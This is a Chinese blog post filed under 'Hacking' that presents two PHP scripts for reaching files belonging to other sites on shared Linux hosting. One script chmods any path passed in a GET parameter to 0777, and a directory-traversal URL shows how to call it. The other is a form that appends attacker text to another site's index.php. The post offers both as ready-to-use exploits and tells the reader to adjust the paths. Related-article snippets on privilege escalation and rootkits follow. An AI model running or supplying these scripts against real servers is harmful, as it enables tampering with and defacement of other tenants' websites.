linux不提权跨目录访问的代码

最新推荐文章于 2021-09-05 11:21:50 发布
最新推荐文章于 2021-09-05 11:21:50 发布
阅读量698 收藏
点赞数
分类专栏: Hacking 文章标签: linux permissions path javascript website fp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/7044734
版权

linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。

在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。

代码如下:

<?php
$path = stripslashes($_GET['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>

把上面代码保存为tmdsb.PHP


然后访问http://www.tmdsb.com/tmdsb.php?path=../../要跨的目录/index.php

这里的index.PHP是要修改权限的文件。

收集的另一个exp:

把下面的代码保存为exp.PHP

代码:


<?php
@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']);
$fp = @fopen({$_POST['filename']}, 'a');
@fputs($fp,$mess <hr size=1 color=black>);
@fclose($fp);
?>
<form name=form1 action=exploit.php method=post>
<p align=center><b>
<br>
CODE :<br>
<textarea name=mess rows=3></textarea></font></b></textarea>
</font></b> <p><input type=hidden name=filename value=../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php></p>
<center>
<input type=reset name=Submit value=Delete>
<input name=go type=submit value=Send onClick=javascript:this.style.visibility ='hidden';>
<center>
</form>
<meta http-equiv=Content-Type content=text/html; charset=iso-8859-1>
<title>Changing CHMOD Permissions Exploit – Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title>
</head>
<body>
</center>
</body>

注意上面代码里面的路径。用的时候要改成你要访问的目录和文件。

7禧
关注
专栏目录
android 提权 进程注入,Android 系统漏洞提权分析
weixin_36329818的博客
05-28 1233
(一) 序言1.1什么是rootRoot——也就是我们这里说的系统提权,通常是针对Android系统的手机而言,它使得用户可以获取Android操作系统的超级用户权限。root通常用于帮助用户越过手机制造商的限制,使得用户可以卸载手机制造商预装在手机中某些应用程序,以及运行一些需要超级用户权限的应用程序。Android系统的root与AppleiOS系统的越狱类似。1.2如何实现root一般roo...
linux keyring原理,Linux keyring提权漏洞分析(CVE
weixin_39568232的博客
05-13 873
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?0x0 序本文深入分析今年初公开的一个Linux提权漏洞,分析该漏洞之前先介绍下Linux密钥保留服务,该服务主要用于在内核中缓存身份验证数据,使内核可以快速访问所需的密钥,还可以将密钥的操作(keyctl, add_key, request_key)委托给用户态进程,同时该服务定义了两个标准密钥类型user和keyri...
linux目录查找大文件,linux 查找大目录和大文件的方法(推荐)
weixin_42311335的博客
04-29 177
今天,在机器上执行命令的时候,发现tab键无法补全了,原因竟然是磁盘空间满了,使用df命令看了一下,确实如此,每个分区的使用率都得到100%了,因此想找到系统中的大目录和大文件,删除一部分。主要涉及到两个命令 du和finddu命令(查找系统中的大目录):-h已易读的格式显示指定目录或文件的大小-s选项指定对于目录不详细显示每个子目录或文件的大小-m或?megabytes 以1MB为单位?max-...
linux 机器 权限,在linux下修改文件夹机器子文件夹的权限
weixin_30246273的博客
05-06 152
使用命令:chmod用法:chmod [选项]... 模式[,模式]... 文件...或:chmod [选项]... 八进制模式 文件...或:chmod [选项]... --reference=参考文件 文件...Change the mode of each FILE to MODE.With --reference, change the mode of each FILE to that ...
linux怎么将一个文件移动到另一个目录
热门推荐
栗少的博客
09-05 5万+
用mv命令 1.作用 mv命令来为文件或目录改名或将文件由一个目录移入另一个目录中。该命令等同于DOS系统下的ren和move命令的组合。它的使用权限是所有用户。 2.格式 mv [options] 源文件或目录 目标文件或目录 3.[options]主要参数 -i:交互方式操作。如果mv操作将导致对已存在的目标文件的覆盖,此时系统询问是否重写,要求用户回答”y”或”n”,这样可以避免误覆盖文件。 -f:禁止交互操作。mv操作要覆盖某个已有的目标文件时不给任何指示,指定此参数后i参数将不再起作用。 4.第.
linux服务器之间数据迁移权限不够解决方案
qq_39306234的博客
07-28 767
问题描述: linux下服务器之间迁移文件,因权限不够,无法迁移成功 Permission denied 原因分析: 用户权限不够,无法迁移到指定目录 解决方案: 首先在目标服务器提权 su 提权之后在目标服务器的目标目录新建文件夹 mkdir temp 然后将文件夹赋权给你的用户 chown -R liming /temp 然后将要迁移的数据迁移到有权限的文件夹下即可 scp -r /data/学习资料 liming@192.168.0.1:/home/liming/temp 然后
Nginx——防止webshell目录
01-10 609
nginx为多用户多域名提供虚拟主机一直都是个问题.在php的执行上是采用fastcgi的方式运行的.php在fastcgi模式下虽然效率有很多提升,但是也暴露出一个问题,就是安全性问题.php以fastcgi方式运行一般是采用tcp或者socket方式,这两种方式本质上是一样的. 都是以同一个用户权限执行,这样在多用户多域名多网站的情况下就变得很糟糕,很容易形成站.被黑客利用的话,他就可以遍历
linux项目工程资料-基于LKM的Linux内核级rootkit的实现,包含模块隐藏、提权、文件隐藏、端口隐藏功能.zip
最新发布
03-02
平台性:Linux操作系统可以在多种硬件架构和平台上运行,包括x86、ARM、MIPS等。这使得Linux成为了一种非常灵活的操作系统,适用于各种设备和应用场景。 可定制性:由于Linux的源代码是公开的,用户可以根据自己的...
部分渗透提权文章
04-16
例如,CVE-2016-5195(Dirty COW)是一个著名的Linux内核漏洞,攻击者可以利用它在用户权限下执行任意代码,从而提权。 学习这些知识,不仅可以帮助网络安全专家更好地进行防御,也可以让渗透测试人员更有效地发现...
Linux入侵常用命令之防黑客示例代码
09-15
Linux入侵常用命令之防黑客示例代码】这篇文章主要探讨了在Linux环境下,黑客可能使用的攻击手段以及如何防止这些攻击。以下是对文章中涉及的知识点的详细解释: 1. **PHP一句话后门**: 黑客可能会通过上传包含...
Linux系统间目录访问,linux系统命令目录访问和操作
weixin_32283253的博客
04-29 831
对于linux系统命令来说访问许可权限是至关重要的一部分,用它来确定谁可以通过何种方式对文件和目录进行访问和操作。文件或目录访问权限分为只读,只写和可执行三种。以文件为例,只读权限表示只允许读其内容,而禁止对其做任何的更改操作。可执行权限表示允许将该文件作为一个程序执行。文件被创建时,文件所有者自动拥有对该文件的读、写和可执行权限,以便于对文件的阅读和修改。用户也可根据需要把访问权限设置为需要的...
linux 下获得当前目录,上级目录,文件夹名
lunaticman
09-17 3万+
$PWD  /pwd   当前目录 dirname '$PWD'  shangji
旁注虚拟主机IIS权限重分配目录得webshell
kendyhj9999的专栏
03-09 1109
旁注虚拟主机IIS权限重分配目录得webshell http://www.2cto.com/Article/201303/197693.html 2013-03-25 10:44:27     我来说两句    来源:Silic Network Solutions   作者:YoCo Smart 收藏    我要投稿 国内的IDC运营商最常见的模式就是IIS搭
Linux文件和目录访问权限设置
HAIFU_XU
11-19 1万+
一、文件和目录权限概述   在linux中的每一个文件或目录都包含有访问权限,这些访问权限决定了谁能访问和如何访问这些文件和目录。   通过设定权限可以从以下三种访问方式限制访问权限:只允许用户自己访问;允许一个预先指定的用户组中的用户访问;允许系统中的任何用户访问。同时,用户能够控制一个给定的文件或目录访问程度。一个文件活目录可能有读、写及执行权限。当创建一个文件时,系统会自动地赋予文
linux上如何让other用户访问没有other权限的目录
weixin_30640769的博客
04-19 1356
目前遇到一个问题,一个other用户要访问一个目录,他需要在这个目录下创建文件,因此这个目录需要一个写权限,于是就给了这个目录777的权限,这样这个权限有点太大了,很容易出现安全问题,那我们应该怎么办呢。 我们先来看为什么一定要给这个目录777的权限呢?例如这个other用户为lbh,这个目录为/home/tmp_test/。我们在/home目录下创建tmp_test目录,创建好后,这个目录的默...
linux 系统中 Python 的目录导包出现问题怎么处理
qq_16069927的博客
03-14 1376
# import sys # sys.path.append("&lt;包所在的目录&gt;") # import 包名 如需要导 /root/app/ 下的 Info.py 可以为 import sys sys.path.append("/root/app/") import Info
Linux 提权的各种姿势总结
weixin_45116657的博客
11-21 5434
友情链接:Linux 提权的各种姿势总结 目录 提权方式总结 1、利用内核栈溢出提权 1.1> 信息收集 1.2> linux-exploit-suggester-2 2、明文 root 密码提权 3、密码复用 4、sudo 滥用 (1)su (2)awk (3)man (4)curl 5、su root 被禁止解决 6、计划任务 (1)重写pyth...
Linux C代码实现文件与目录拷贝
"这篇资源提供了一段C语言代码,用于在Linux系统中实现目录和文件的拷贝功能。代码经过作者的调试和注释,具备参数检查、文件属性读取以及权限管理等功能。" 该代码主要涉及以下几个Linux编程的知识点: 1. **fork...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值